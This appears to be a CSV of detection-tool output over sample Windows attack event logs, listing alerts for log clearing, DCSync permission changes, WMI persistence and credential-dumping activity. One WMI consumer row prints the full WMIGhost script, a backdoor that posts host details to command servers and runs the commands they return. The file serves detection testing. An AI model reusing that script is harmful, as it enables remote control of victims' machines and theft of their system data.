+2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
+2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
+2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i<vals.length;i++){result+=String.fromCharCode(vals[i]^keycode);}return result;},circleDecode:function(sc){var base=sc.charCodeAt(0);var s=base-32;var r='';for(var i=1;i<sc.length;i++){var nc=sc.charCodeAt(i)-s-i+1;if(nc<32){nc=126+(nc-32)%94;}r+=String.fromCharCode(nc);}return r;},MainLoop:function(){$.oHttp=new $._x('Microsoft.XmlHttp');var feedUrlArry=$.sFeedUrl.split(';');var start=new Date();var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');for(var n=0;n<feedUrlArry.length;n++){var UrlList=new Array();var URLnum=0;try{var tstr=feedUrlArry[n].match('http://.*?\\\\.php');if(tstr!=null){UrlList[URLnum++]=tstr;}else{$.oHttp.Open('GET',feedUrlArry[n],false);$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');$.oHttp.Send();var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');var re=/<title>@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i<titleList.length;i++){try{oXml.loadXML(titleList[i]);var container=oXml.getElementsByTagName('title');var tmpstr=container[0].text.match('@(.*)@');UrlList[URLnum++]=$.circleDecode(tmpstr[1]);}catch(e){}}}for(var Urlindex=0;Urlindex<UrlList.length;Urlindex++){$.sXmlUrl=UrlList[Urlindex];var runnum=360;while(runnum-->0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i<container.length;i++){if(container[i].getAttribute('id')=='0a552b5a4352'){commands=eval('('+container[i].text+')').command;}}}catch(e){}if(commands!=null){var commandresult='';for(var i=0;i<commands.length;i++){var result='no response';try{result=eval($.Decode(commands[i].value));}catch(e){}if(i>0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
